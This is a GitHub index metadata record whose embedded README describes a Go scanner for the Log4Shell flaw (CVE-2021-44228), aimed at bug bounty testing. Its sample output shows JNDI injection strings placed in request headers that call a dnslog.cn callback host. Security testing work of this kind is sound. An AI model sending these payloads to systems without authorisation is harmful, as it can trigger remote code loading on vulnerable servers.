{"id":13842043,"url":"https://github.com/ravro-ir/log4shell-looker","last_synced_at":"2025-10-13T13:56:59.909Z","repository":{"id":45327443,"uuid":"438887305","full_name":"ravro-ir/log4shell-looker","owner":"ravro-ir","description":"log4jshell vulnerability scanner for bug bounty","archived":false,"fork":false,"pushed_at":"2021-12-21T02:09:31.000Z","size":193,"stargazers_count":23,"open_issues_count":0,"forks_count":4,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-08-05T17:30:18.965Z","etag":null,"topics":["bugbounty","bugs","java","java-8","log4j","log4j2","log4shell","logger","logging","secuurity","vulnerabilities","vulnerability","vulnerability-detection","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ravro-ir.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-16T06:44:02.000Z","updated_at":"2024-06-11T16:12:46.000Z","dependencies_parsed_at":"2022-09-26T20:30:56.648Z","dependency_job_id":null,"html_url":"https://github.com/ravro-ir/log4shell-looker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ravro-ir%2Flog4shell-looker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ravro-ir%2Flog4shell-looker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ravro-ir%2Flog4shell-looker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ravro-ir%2Flog4shell-looker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ravro-ir","download_url":"https://codeload.github.com/ravro-ir/log4shell-looker/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729814,"owners_count":17515171,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bugs","java","java-8","log4j","log4j2","log4shell","logger","logging","secuurity","vulnerabilities","vulnerability","vulnerability-detection","vulnerability-scanners"],"created_at":"2024-08-04T17:01:26.492Z","updated_at":"2025-10-13T13:56:54.883Z","avatar_url":"https://github.com/ravro-ir.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"## log4shell-looker a log4jshell vulnerability scanner for bug bounty\n\n(Written in Go because, you know, \"write once, run anywhere.\")\n\nThis is a simple tool that can be used to find vulnerable instances of\nlog4j 1.x and 2.x (CVE-2021-44228) in installations of\nJava software such as web applications.\n\nThe scan tool currently checks for discover log4shell vulnerability.\u003cbr /\u003e \nCurrent feature of tools: \n`Cookies`, `Content-Type`, `URL Path`, `User-Agent`, `Headers`\n\n\n# Using the scanner\n```bash\n$ go run main.go --help\nUsage of main:\n  -mode string\n        please usage mode [urlpath, header, useragent] (default \"[urlpath, header, useragent, cookie, contents]\")\n  -url string\n        please enter you url for scan (default \"url\")\n\n\n$ go run main.go -mode=useragent -url=http://127.0.0.1:8080\n[+++] Your domain generated :  rfcbd0.dnslog.cn\n[+++] Your session is :  1s16v8k8fmrmd5rljun51lmur4\n[***] Payload :  User-Agent:${jndi:ldap://rfcbd0.dnslog.cn/}\n[---] Isn't to vulnerability CVE-2021-44228\n#################### 0 ############################\n[+++] Your domain generated :  rfcbd0.dnslog.cn\n[+++] Your session is :  1s16v8k8fmrmd5rljun51lmur4\n[***] Payload :  Referer:${jndi:ldap://rfcbd0.dnslog.cn/}\n[---] Isn't to vulnerability CVE-2021-44228\n#################### 2 ############################\n[+++] Your domain generated :  rfcbd0.dnslog.cn\n[+++] Your session is :  1s16v8k8fmrmd5rljun51lmur4\n[***] Payload :  X-Api-Version:${jndi:ldap://rfcbd0.dnslog.cn/}\n[***] DNS log result :  [[\"rfcbd0.dnslog.cn\",\"172.253.238.4\",\"2021-12-16 14:45:19\"]]\n[***] Is Vulnerability to CVE-2021-44228 - [critical]\n```\n\n# Building from source\n\nInstall a [Go compiler](https://golang.org/dl).\n\nRun the following commands in the checked-out repository:\n```\ngo run main.go -mode=header -url=https://www.example.com/\nOr\ngo build -o main\n```\n(Add the appropriate `.exe` extension on Windows systems, of course.)\n\n# Example \n\n```bash \n$ go run main.go -mode=header -url=http://127.0.0.1:8080/\n```\n![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/header.PNG)\n\n```bash \n$ go run main.go -mode=useragent -url=http://127.0.0.1:8080/\n```\n![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/user_agent.PNG)\n\n```bash \n$ go run main.go -mode=cookie -url=http://127.0.0.1:8080/\n```\n![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/cookie.PNG)\n\n```bash \n$ go run main.go -mode=urlpath -url=http://127.0.0.1:8080/\n```\n![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/url_path.PNG)\n\n```bash \n$ go run main.go -mode=contents -url=http://127.0.0.1:8080/\n```\n![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/content_type.PNG)\n\n\n\n# License\n\nGNU General Public License, version 3\n\n# Author\n\nRamin Farajpour Cami \u003c\u003cramin.blackhat@gmail.com\u003e\u003e\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fravro-ir%2Flog4shell-looker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fravro-ir%2Flog4shell-looker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fravro-ir%2Flog4shell-looker/lists"}